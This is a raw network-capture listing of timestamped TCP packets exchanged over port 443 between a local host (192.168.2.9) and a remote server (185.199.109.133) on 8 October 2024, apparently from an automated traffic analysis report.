Oct 8, 2024 14:02:25.486139059 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.486155987 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.486208916 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.486217022 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.486233950 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.486782074 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.486793995 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.486859083 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.486865997 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.486910105 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.489459991 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.532603979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.532624960 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.532923937 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.532939911 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570214987 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570259094 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570353031 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570363045 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570378065 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570405006 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570426941 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570471048 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570477962 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570497036 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570607901 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570632935 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570660114 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570671082 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570699930 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570766926 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570796013 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570851088 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.570858002 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.570895910 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.573158979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.573189020 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.573275089 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.573275089 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.573282957 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.573390961 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.573410988 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.573453903 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.573462009 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.573479891 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.576836109 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.576862097 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.576906919 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.576915026 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.576927900 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.618923903 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.625175953 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.625205040 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.625314951 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.625324965 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.625339985 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.625547886 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.657232046 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657305002 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657466888 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.657476902 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657486916 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.657624006 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657665968 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657694101 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.657705069 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657798052 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.657948971 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.657989979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.658056974 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.658056974 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.658066988 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.658216000 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.658256054 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.658298969 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.658307076 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.658343077 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.660295963 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.660342932 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.660440922 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.660440922 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.660449028 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.660592079 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.660634041 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.660657883 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.660685062 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.660734892 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.663566113 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.663588047 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.663867950 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.663882017 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.712321043 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.712351084 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.712578058 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.712590933 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744220972 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744267941 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744364977 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.744364977 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.744375944 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744410992 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744436979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744467974 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.744483948 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744507074 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.744623899 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744658947 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744770050 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.744790077 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744941950 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.744962931 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.745065928 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.745074987 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.747561932 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.747584105 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.747674942 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.747684002 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.747704983 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.747805119 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.747826099 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.747884035 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.747884035 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.747894049 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.750550032 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.750586987 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.750662088 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.750662088 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.750672102 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.790889025 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.799573898 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.799597025 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.799720049 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.799720049 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.799731970 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.799773932 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.832367897 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.832393885 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.832505941 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.832516909 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.832590103 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.832711935 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.832730055 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.832778931 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.832786083 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.832837105 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.833178043 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.833199024 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.833271027 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.833271027 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.833278894 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.833372116 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.833559036 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.833575964 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.833632946 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.833640099 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.833658934 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.833678961 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.836174011 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.836213112 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.836268902 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.836276054 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.836311102 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.836311102 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.836375952 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.836391926 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.836451054 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.836458921 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.836473942 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.836500883 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.839075089 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.839093924 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.839153051 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.839163065 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.839199066 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.839258909 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.886833906 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.886854887 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.886966944 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.886997938 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.887151003 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.918642998 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.918659925 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.918731928 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.918778896 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.918783903 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.918808937 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.918837070 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.918903112 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.919406891 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.919420958 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.919492006 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.919528008 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.919564009 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.919564962 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.919575930 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.919641972 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.919641972 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.921582937 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.921597004 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.921685934 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.921695948 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.921714067 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.921758890 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.922075033 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.922090054 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.922147989 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.922174931 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.922358036 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.926971912 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.926986933 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.927074909 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.927087069 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.927232981 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.973575115 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.973628044 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.973936081 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:25.973959923 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:25.974054098 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.005374908 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005398989 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005517006 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.005538940 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005614996 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.005619049 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005634069 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005656958 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005688906 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.005701065 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.005728006 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.005774021 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.006072998 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.006093979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.006150961 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.006160021 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.006211996 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.006295919 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.006313086 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.006352901 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.006371975 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.006411076 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.006411076 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.008811951 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.008827925 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.008909941 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.008923054 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.008992910 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.009143114 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.009160042 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.009386063 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.009399891 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.009710073 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.013780117 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.013798952 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.013926983 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.013937950 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.014240980 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.061045885 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.061065912 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.061165094 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.061183929 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.061237097 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.092458963 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.092483044 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.092653036 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.092669010 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.092818022 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093075037 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093092918 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093194962 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093203068 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093250036 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093368053 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093389034 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093491077 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093498945 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093563080 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093575954 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093599081 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093668938 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093668938 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.093676090 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.093717098 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.095959902 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.095988035 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.096069098 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.096079111 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.096172094 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.096230030 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.096252918 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.096332073 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.096340895 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.096415997 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.100806952 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.100826979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.100893974 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.100903988 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.100944042 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.147696972 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.147721052 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.148242950 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.148261070 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.148319006 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.179202080 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179224968 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179550886 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.179563046 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179636955 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.179780006 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179804087 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179872990 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179905891 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.179905891 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.179917097 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.179949045 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.179984093 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.180179119 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.180198908 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.180322886 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.180331945 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.182667971 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.182697058 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.182773113 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.182780981 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.182800055 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.183037043 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.183058977 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.183135986 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.183135986 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.183146000 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.188082933 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.188108921 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:26.188199043 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:26.188209057 CEST	443	49707	185.199.109.133	192.168.2.9
